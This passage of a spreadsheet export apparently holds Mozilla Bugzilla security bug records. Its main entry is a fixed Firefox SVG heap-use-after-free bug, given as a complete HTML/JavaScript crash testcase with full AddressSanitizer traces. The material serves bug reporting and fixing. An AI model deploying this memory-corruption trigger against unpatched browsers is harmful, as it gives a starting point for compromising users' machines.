#0  0x0007f3b4 in ReportCompileErrorNumber (cx=0x600180, handle=0x1814b00, flags=512, errorNumber=102, report=0xbfffdaa4, charArgs=1, ap=0xbfffdb18 "???h") at jsscan.c:571
#1  0x0007f92c in js_ReportCompileErrorNumber (cx=0x600180, handle=0x1814b00, flags=512, errorNumber=102) at jsscan.c:710
#2  0x000d90dc in CheckDestructuring (cx=0x600180, data=0xbfffdc34, left=0x1814ab0, right=0x0, tc=0xbfffe568) at jsparse.c:2212
#3  0x000e26a0 in PrimaryExpr (cx=0x600180, ts=0x1815010, tc=0xbfffe568, tt=TOK_LB, afterDot=0) at jsparse.c:5299
#4  0x000df598 in MemberExpr (cx=0x600180, ts=0x1815010, tc=0xbfffe568, allowCallSyntax=1) at jsparse.c:4231
#5  0x000df0d8 in UnaryExpr (cx=0x600180, ts=0x1815010, tc=0xbfffe568) at jsparse.c:4141
#6  0x000de734 in MulExpr (cx=0x600180, ts=0x1815010, tc=0xbfffe568) at jsparse.c:3984
#7  0x000de61c in AddExpr (cx=0x600180, ts=0x1815010, tc=0xbfffe568) at jsparse.c:3966</t>
        </is>
      </c>
      <c r="X5603" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5604">
      <c r="A5604" t="n">
        <v>1448774</v>
      </c>
      <c r="B5604" t="inlineStr">
        <is>
          <t>2018-03-26 00:39:02 -0700</t>
        </is>
      </c>
      <c r="C5604" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::CharIterator::GetOriginalGlyphOffsets</t>
        </is>
      </c>
      <c r="D5604" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:14 -0700</t>
        </is>
      </c>
      <c r="E5604" t="n">
        <v>1</v>
      </c>
      <c r="F5604" t="n">
        <v>1</v>
      </c>
      <c r="G5604" t="n">
        <v>3</v>
      </c>
      <c r="H5604" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5604" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5604" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5604" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L5604" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5604" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5604" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5604" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5604" t="inlineStr">
        <is>
          <t>[adv-main60+][adv-esr52.8+]</t>
        </is>
      </c>
      <c r="Q5604" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5604" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5604" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T5604" t="n">
        <v>1</v>
      </c>
      <c r="U5604" t="n">
        <v>0</v>
      </c>
      <c r="V5604" t="n">
        <v>24</v>
      </c>
      <c r="W5604" t="inlineStr">
        <is>
          <t>Created attachment 8962261
svg.svg
The following testcase crashes the latest ASAN build of Firefox 61.0a1 (SourceStamp=b4aeb99d1cb601e5a5288ca05630913fa8528a1c). It requires the attached svg.svg in the same directory.
crash.html:
&lt;script&gt;
function start() {
	o100=window.open('svg.svg','p58','height=6');
	o100.onload=fun0;
	setTimeout(fun1, 400);
}
function fun0(e) {
	o101=e.target;;
	o109=o101.getElementById('id1');
	o120=o101.getElementById('id8');
}
function fun1() {
	o167=o109.ownerDocument;
	o168=document.createElement('head');
	o167.documentElement.appendChild(o168);
	o120.setAttribute('width','393216');
	o206=document.createElement('head');
	o167.documentElement.appendChild(o206);
	o207=document.createElement('style');
	o206.appendChild(o207);
	o207.textContent="*{ -moz-transition: 235ms; -moz-border-end-color: green; border-right-style: inset";
	setTimeout(fun2,240);
}
function fun2() {
	o120.setAttribute('viewBox','0 0 1000 1000');
	o5=document.createElement("div");
	o5.innerHTML="&lt;svg height='10px' xmlns='http://www.w3.org/2000/svg'&gt;&lt;set attributeName='font-weight'&gt;&lt;style&gt;*{{}}*{ background-position-x: 1px";
	o168.innerHTML=o5.innerHTML;
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==15139==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000131768 at pc 0x7fa844a5c5d0 bp 0x7ffdd01c31d0 sp 0x7ffdd01c31c8
READ of size 8 at 0x612000131768 thread T0 (file:// Content)
    #0 0x7fa844a5c5cf in IsClusterStart /builds/worker/workspace/build/src/obj-firefox/dist/include/gfxTextRun.h:113:16
    #1 0x7fa844a5c5cf in mozilla::CharIterator::GetOriginalGlyphOffsets(unsigned int&amp;, unsigned int&amp;) const /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:2596
    #2 0x7fa844a5c6ea in mozilla::CharIterator::GetGlyphAdvance(nsPresContext*) const /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:2618:3
    #3 0x7fa844a7bfee in SVGTextFrame::DoTextPathLayout() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5108:12
    #4 0x7fa844a7fdb5 in SVGTextFrame::DoGlyphPositioning() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5365:3
    #5 0x7fa844a82ce8 in UpdateGlyphPositioning /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5433:5
    #6 0x7fa844a82ce8 in SVGTextFrame::TransformFrameRectFromTextChild(nsRect const&amp;, nsIFrame*) /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5734
    #7 0x7fa844528b3c in nsLayoutUtils::TransformFrameRectToAncestor(nsIFrame*, nsRect const&amp;, nsIFrame const*, bool*, mozilla::Maybe&lt;mozilla::gfx::Matrix4x4TypedFlagged&lt;mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits&gt; &gt;*, bool, nsIFrame**) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3139:27
    #8 0x7fa84472631a in IsFrameScrolledOutOfView(nsIFrame*, nsRect const&amp;, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11026:5
    #9 0x7fa844726190 in nsIFrame::IsScrolledOutOfView() /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11057:10
    #10 0x7fa83ef594a8 in mozilla::dom::KeyframeEffectReadOnly::CanThrottle() const /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1172:16
    #11 0x7fa83ef345d2 in mozilla::dom::KeyframeEffectReadOnly::NotifyAnimationTimingUpdated() /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:134:7
    #12 0x7fa83ef32775 in mozilla::dom::Animation::UpdateTiming(mozilla::dom::Animation::SeekFlag, mozilla::dom::Animation::SyncNotifyFlag) /builds/worker/workspace/build/src/dom/animation/Animation.cpp:1346:3
    #13 0x7fa83ef2c0f1 in mozilla::dom::Animation::Tick() /builds/worker/workspace/build/src/dom/animation/Animation.cpp:699:3
    #14 0x7fa844382440 in mozilla::dom::CSSTransition::Tick() /builds/worker/workspace/build/src/layout/style/nsTransitionManager.cpp:337:14
    #15 0x7fa83ef44afe in mozilla::dom::DocumentTimeline::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/animation/DocumentTimeline.cpp:184:16
    #16 0x7fa844396517 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1884:12
    #17 0x7fa8443a6a00 in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:338:13
    #18 0x7fa8443a6a00 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:308
    #19 0x7fa8443a65c6 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:330:5
    #20 0x7fa8443a933e in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:771:5
    #21 0x7fa8443a933e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:684
    #22 0x7fa8443a8f3e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:585:9
    #23 0x7fa844c56e9f in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #24 0x7fa83d7cc550 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:156:20
    #25 0x7fa83d6b73d4 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1968:28
    #26 0x7fa83d25583e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2135:25
    #27 0x7fa83d2527c1 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2065:17
    #28 0x7fa83d253fbc in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1911:5
    #29 0x7fa83d254618 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1944:15
    #30 0x7fa83c382568 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1096:14
    #31 0x7fa83c39e8d0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #32 0x7fa83d25d396 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5
    #33 0x7fa83d1b08a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #34 0x7fa83d1b08a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #35 0x7fa83d1b08a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #36 0x7fa843e3379a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #37 0x7fa8480e478b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #38 0x7fa83d1b08a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #39 0x7fa83d1b08a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #40 0x7fa83d1b08a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #41 0x7fa8480e416a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:719:34
    #42 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #43 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #44 0x7fa85c0be82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #45 0x420f48 in _start (/fuzzer3/firefox/firefox+0x420f48)
0x612000131768 is located 40 bytes inside of 288-byte region [0x612000131740,0x612000131860)
freed by thread T0 (file:// Content) here:
    #0 0x4c1952 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7fa8448e7b61 in ClearTextRuns /builds/worker/workspace/build/src/layout/generic/nsTextFrame.h:626:5
    #2 0x7fa8448e7b61 in nsTextFrame::MarkIntrinsicISizesDirty() /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8530
    #3 0x7fa8443eeb38 in mozilla::PresShell::FrameNeedsReflow(nsIFrame*, nsIPresShell::IntrinsicDirty, nsFrameState, nsIPresShell::ReflowRootHandling) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:2797:18
    #4 0x7fa84443f14d in StyleChangeReflow /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1234:26
    #5 0x7fa84443f14d in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&amp;) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1559
    #6 0x7fa84444d8f5 in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1188:9
    #7 0x7fa844406ffd in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1264:3
    #8 0x7fa844406ffd in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:43
    #9 0x7fa844406ffd in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4259
    #10 0x7fa83f3e33c8 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
    #11 0x7fa83f3e33c8 in nsIDocument::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7649
    #12 0x7fa8438218af in nsSMILAnimationController::DoSample(bool) /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.cpp:440:15
    #13 0x7fa84337257b in Resample /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.h:74:21
    #14 0x7fa84337257b in FlushResampleRequests /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.h:90
    #15 0x7fa84337257b in FlushAnimations /builds/worker/workspace/build/src/dom/svg/nsSVGElement.cpp:2677
    #16 0x7fa84337257b in nsSVGEnum::DOMAnimatedEnum::AnimVal() /builds/worker/workspace/build/src/dom/svg/nsSVGEnum.h:97
    #17 0x7fa844a7bf5d in SVGTextFrame::DoTextPathLayout() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5099:31
    #18 0x7fa844a7fdb5 in SVGTextFrame::DoGlyphPositioning() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5365:3
    #19 0x7fa844a82ce8 in UpdateGlyphPositioning /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5433:5
    #20 0x7fa844a82ce8 in SVGTextFrame::TransformFrameRectFromTextChild(nsRect const&amp;, nsIFrame*) /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5734
    #21 0x7fa844528b3c in nsLayoutUtils::TransformFrameRectToAncestor(nsIFrame*, nsRect const&amp;, nsIFrame const*, bool*, mozilla::Maybe&lt;mozilla::gfx::Matrix4x4TypedFlagged&lt;mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits&gt; &gt;*, bool, nsIFrame**) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3139:27
    #22 0x7fa84472631a in IsFrameScrolledOutOfView(nsIFrame*, nsRect const&amp;, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11026:5
    #23 0x7fa844726190 in nsIFrame::IsScrolledOutOfView() /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11057:10
    #24 0x7fa83ef594a8 in mozilla::dom::KeyframeEffectReadOnly::CanThrottle() const /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1172:16
    #25 0x7fa83ef345d2 in mozilla::dom::KeyframeEffectReadOnly::NotifyAnimationTimingUpdated() /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:134:7
    #26 0x7fa83ef32775 in mozilla::dom::Animation::UpdateTiming(mozilla::dom::Animation::SeekFlag, mozilla::dom::Animation::SyncNotifyFlag) /builds/worker/workspace/build/src/dom/animation/Animation.cpp:1346:3
    #27 0x7fa83ef2c0f1 in mozilla::dom::Animation::Tick() /builds/worker/workspace/build/src/dom/animation/Animation.cpp:699:3
    #28 0x7fa844382440 in mozilla::dom::CSSTransition::Tick() /builds/worker/workspace/build/src/layout/style/nsTransitionManager.cpp:337:14
    #29 0x7fa83ef44afe in mozilla::dom::DocumentTimeline::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/animation/DocumentTimeline.cpp:184:16
    #30 0x7fa844396517 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1884:12
    #31 0x7fa8443a6a00 in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:338:13
    #32 0x7fa8443a6a00 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:308
    #33 0x7fa8443a65c6 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:330:5
    #34 0x7fa8443a933e in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:771:5
    #35 0x7fa8443a933e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:684
    #36 0x7fa8443a8f3e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:585:9
    #37 0x7fa844c56e9f in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #38 0x7fa83d7cc550 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:156:20
    #39 0x7fa83d6b73d4 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1968:28
    #40 0x7fa83d25583e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2135:25
previously allocated by thread T0 (file:// Content) here:
    #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7fa83ec6d177 in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) /builds/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:128:21
    #2 0x7fa8448a771a in Create /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:51:19
    #3 0x7fa8448a771a in MakeTextRun /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:114
    #4 0x7fa8448a771a in nsTransformingTextRunFactory::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, gfxFontGroup*, mozilla::gfx::ShapedTextFlags, nsTextFrameUtils::Flags, nsTArray&lt;RefPtr&lt;nsTransformedCharStyle&gt; &gt;&amp;&amp;, bool) /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:131
    #5 0x7fa8448a1fb7 in BuildTextRunsScanner::BuildTextRunForFrames(void*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2396:38
    #6 0x7fa84489b718 in BuildTextRunsScanner::FlushFrames(bool, bool) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1699:17
    #7 0x7fa8448ac9a7 in BuildTextRuns /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1625:11
    #8 0x7fa8448ac9a7 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2864
    #9 0x7fa8448eadac in nsTextFrame::AddInlinePrefISizeForFlow(gfxContext*, nsIFrame::InlinePrefISizeData*, nsTextFrame::TextRunType) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8728:5
    #10 0x7fa8448ecafa in nsTextFrame::AddInlinePrefISize(gfxContext*, nsIFrame::InlinePrefISizeData*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8864:10
    #11 0x7fa84462c5fe in nsBlockFrame::GetPrefISize(gfxContext*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:860:16
    #12 0x7fa844a80936 in SVGTextFrame::DoReflow() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5520:29
    #13 0x7fa844a67e96 in MaybeReflowAnonymousBlockChild /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5475:5
    #14 0x7fa844a67e96 in SVGTextFrame::ReflowSVG() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:3772
    #15 0x7fa844a68fc9 in nsSVGDisplayContainerFrame::ReflowSVG() /builds/worker/workspace/build/src/layout/svg/nsSVGContainerFrame.cpp:350:17
    #16 0x7fa844ace528 in nsSVGOuterSVGFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/svg/nsSVGOuterSVGFrame.cpp:455:14
    #17 0x7fa844694f76 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:940:14
    #18 0x7fa8446937bd in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:713:5
    #19 0x7fa844694f76 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:940:14
    #20 0x7fa844770818 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:554:3
    #21 0x7fa844771c39 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&amp;) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:677:3
    #22 0x7fa844775c18 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1054:3
    #23 0x7fa84461551e in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, int, int, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:984:14
    #24 0x7fa844614099 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:335:7
    #25 0x7fa8443f3681 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:8838:11
    #26 0x7fa8444090d0 in mozilla::PresShell::ProcessReflowCommands(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9011:24
    #27 0x7fa8444074f3 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4309:11
    #28 0x7fa844396ecd in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
    #29 0x7fa844396ecd in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1939
    #30 0x7fa8443a1354 in nsRefreshDriver::FinishedWaitingForTransaction() /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2163:5
    #31 0x7fa83e9422b3 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /builds/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:532:32
    #32 0x7fa8436ffd1b in mozilla::dom::TabChild::DidComposite(unsigned long, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:3127:7
    #33 0x7fa83ea3449a in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&amp;, unsigned long const&amp;, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:548:14
    #34 0x7fa83d9f9e09 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1401:20
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/gfxTextRun.h:113:16 in IsClusterStart
Shadow bytes around the buggy address:
  0x0c248001e290: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e2a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c248001e2b0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c248001e2c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e2d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
=&gt;0x0c248001e2e0: fa fa fa fa fa fa fa fa fd fd fd fd fd[fd]fd fd
  0x0c248001e2f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e300: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c248001e310: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c248001e320: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e330: fd fd fd fd fd fd fd fd fd fd fd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15139==ABORTING</t>
        </is>
      </c>
      <c r="X5604" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5605">
      <c r="A5605" t="n">
        <v>467499</v>
      </c>
      <c r="B5605" t="inlineStr">
        <is>
          <t>2008-12-01 23:10:28 -0800</t>
        </is>
      </c>
      <c r="C5605" t="inlineStr">
        <is>
          <t>crash using array.splice on an array with some non-set elements [@ js_GetGCThingTraceKind ]</t>
        </is>
      </c>
      <c r="D5605" t="inlineStr">
        <is>
          <t>2013-03-19 07:07:11 -0700</t>
        </is>
      </c>
      <c r="E5605" t="n">
        <v>1</v>
      </c>
      <c r="F5605" t="n">
        <v>1</v>
      </c>
      <c r="G5605" t="n">
        <v>3</v>
      </c>
      <c r="H5605" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5605" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5605" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5605" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5605" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5605" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5605" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5605" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5605" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey, post 1.8=branch</t>
        </is>
      </c>
      <c r="Q5605" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5605" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5605" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T5605" t="n">
        <v>1</v>
      </c>
      <c r="U5605" t="n">
        <v>0</v>
      </c>
      <c r="V5605" t="n">
        <v>28</v>
      </c>
      <c r="W5605" t="inlineStr">
        <is>
